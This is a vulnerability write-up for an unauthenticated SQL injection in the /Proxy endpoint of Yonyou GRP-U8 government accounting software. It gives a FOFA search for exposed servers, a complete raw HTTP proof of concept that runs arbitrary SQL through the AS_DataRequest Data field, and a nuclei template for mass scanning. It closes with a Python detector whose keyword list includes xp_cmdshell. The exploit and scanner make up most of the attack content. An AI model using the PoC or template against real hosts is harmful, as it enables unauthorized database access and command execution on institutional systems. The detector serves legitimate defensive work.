Yonyou (用友) GRP-U8 /Proxy SQL injection CNNVD-201610-923
Vulnerability description
The /Proxy endpoint of Yonyou GRP-U8 accepts an XML request packet (R9PACKET) in the dp form parameter. When the packet calls the AS_DataRequest function, the backend hands the contents of its Data parameter to the database as a SQL statement without authentication or filtering, so an attacker can run arbitrary SQL and, depending on the privileges of the database account, escalate to operating-system command execution. This is direct SQL execution through an XML-wrapped request rather than an XXE (external entity) issue; the XML parser is only the transport for the statement.
Affected versions
Yonyou GRP-U8 Administrative Institution Internal Control Management Software, New Government Accounting System edition (用友GRP-U8行政事业内控管理软件(新政府会计制度专版))
Reproduction
FOFA query: title="用友GRP-U8行政事业内控管理软件"
Login page (screenshot not reproduced here):

PoC (a single unauthenticated POST; Content-Length must equal the actual byte length of the body, and the blank line between headers and body is required):
POST /Proxy HTTP/1.1
Host: 
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0;)
Content-Length: 352
Connection: Keep-Alive
Cache-Control: no-cache

cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION> <NAME>AS_DataRequest</NAME><PARAMS><PARAM> <NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM> <NAME>Data</NAME><DATA format="text">select @@version</DATA></PARAM></PARAMS> </R9FUNCTION></R9PACKET>
The Data parameter is the statement that gets executed; select @@version is used here only to fingerprint the database engine from the response. Any SQL the database account is allowed to run can be substituted.

Nuclei template for batch scanning
id: yonyou_GRP-U8_Proxy_sqli_rce
info:
  name: Yonyou GRP-U8 /Proxy AS_DataRequest SQL injection
  author: mczilong
  severity: critical
  description: Unauthenticated SQL injection in the Data parameter of the AS_DataRequest function on /Proxy (CNNVD-201610-923). The statement is executed by the backend database and can be escalated to command execution.
  metadata:
    fofa-query: title="用友GRP-U8行政事业内控管理软件"
  tags: yonyou,oa,sqli
requests:
  - raw:
      - |
        @timeout: 25s
        POST /Proxy HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0;)
        Connection: Keep-Alive
        Cache-Control: no-cache

        cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION> <NAME>AS_DataRequest</NAME><PARAMS><PARAM> <NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM> <NAME>Data</NAME><DATA format="text">select @@version</DATA></PARAM></PARAMS> </R9FUNCTION></R9PACKET>

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 500
      - type: word
        part: body
        condition: or
        words:
          - "<SESSIONID>"
          - "ERROR"
Notes on the template: the headers Accept, Content-Type, User-Agent and Host must each be on their own line, Host is filled from {{Hostname}} rather than the literal "host", a blank line must separate the headers from the body, and Content-Length is left out because nuclei computes it for raw requests. The word matcher fires on either string (condition: or), so a 500 from /Proxy that merely contains "ERROR" is also reported; treat a hit as a candidate and confirm it with the database version string returned for select @@version.
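The same packet structure can be used on the defensive side. As an added example (not from the original writeup), the Python below parses captured /Proxy request bodies as a WAF or reverse proxy would record them, pulls the R9FUNCTION name and the Data parameter out of the dp field, and flags AS_DataRequest calls that carry a SQL statement. The sample requests, the function name AS_Hypothetical and the keyword list are constructed for the example; tune the keyword list against real traffic before deploying it.

```python
"""Detect CNNVD-201610-923 exploitation attempts in captured /Proxy request bodies.

Added example, not from the original writeup. Input is a list of (path, body)
pairs such as a WAF or reverse proxy would record; the bodies below are
constructed for this example. The check mirrors the PoC: a form field dp holding
an R9PACKET whose R9FUNCTION is AS_DataRequest with raw SQL in its Data parameter.
"""
import re
import urllib.parse
import xml.etree.ElementTree as ET
from typing import List, Optional, Tuple

# Assumption: a legitimate client never sends a SQL statement in Data, so any
# statement keyword there is treated as an attack. Tune against real traffic.
SQL_KEYWORDS = re.compile(r"\b(select|insert|update|delete|drop|union|exec|execute|xp_cmdshell)\b", re.I)
XML_DECL = re.compile(r"^\s*<\?xml[^>]*\?>")


def parse_dp(body: str) -> Tuple[Optional[str], Optional[str]]:
    """Return (R9FUNCTION name, Data parameter) from a /Proxy form body, or (None, None)."""
    dp = urllib.parse.parse_qs(body, keep_blank_values=True).get("dp", [None])[0]
    if dp is None:
        return None, None
    try:
        # Drop the declaration so ElementTree parses the already-decoded str as-is.
        root = ET.fromstring(XML_DECL.sub("", dp, count=1))
    except ET.ParseError:
        return None, None
    func = root.find("R9FUNCTION")
    if func is None:
        return None, None
    name = (func.findtext("NAME") or "").strip()
    data = None
    for param in func.iterfind("PARAMS/PARAM"):
        if (param.findtext("NAME") or "").strip() == "Data":
            data = param.findtext("DATA") or ""
    return name, data


def is_exploit_attempt(path: str, body: str) -> bool:
    """True when the request targets /Proxy with AS_DataRequest and SQL in Data."""
    if not path.startswith("/Proxy"):
        return False
    name, data = parse_dp(body)
    return name == "AS_DataRequest" and data is not None and SQL_KEYWORDS.search(data) is not None


def scan(requests: List[Tuple[str, str]]) -> List[bool]:
    """One verdict per captured request, in input order."""
    return [is_exploit_attempt(path, body) for path, body in requests]


PACKET = ('<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT>'
          '<R9FUNCTION><NAME>{func}</NAME><PARAMS><PARAM><NAME>ProviderName</NAME>'
          '<DATA format="text">DataSetProviderData</DATA></PARAM><PARAM><NAME>Data</NAME>'
          '<DATA format="text">{data}</DATA></PARAM></PARAMS></R9FUNCTION></R9PACKET>')

# Constructed sample traffic: the PoC as-is, a URL-encoded variant with a different
# statement, a hypothetical non-SQL call, and an unrelated login request.
SAMPLE_REQUESTS = [
    ("/Proxy", "cVer=9.8.0&dp=" + PACKET.format(func="AS_DataRequest", data="select @@version")),
    ("/Proxy", "cVer=9.8.0&dp=" + urllib.parse.quote_plus(
        PACKET.format(func="AS_DataRequest", data="SELECT TOP 1 name FROM sysobjects"))),
    ("/Proxy", "cVer=9.8.0&dp=" + PACKET.format(func="AS_Hypothetical", data="report1")),
    ("/login.jsp", "username=admin&password=admin"),
]

if __name__ == "__main__":
    for (path, _), hit in zip(SAMPLE_REQUESTS, scan(SAMPLE_REQUESTS)):
        print(f"{path}: {'EXPLOIT ATTEMPT' if hit else 'ok'}")
```

Only the first two sample requests are flagged. Parsing the packet with a real XML parser rather than grepping the raw body means URL-encoded and whitespace-padded variants of the PoC are caught the same way, while a malformed dp that the application would reject anyway is ignored instead of raising.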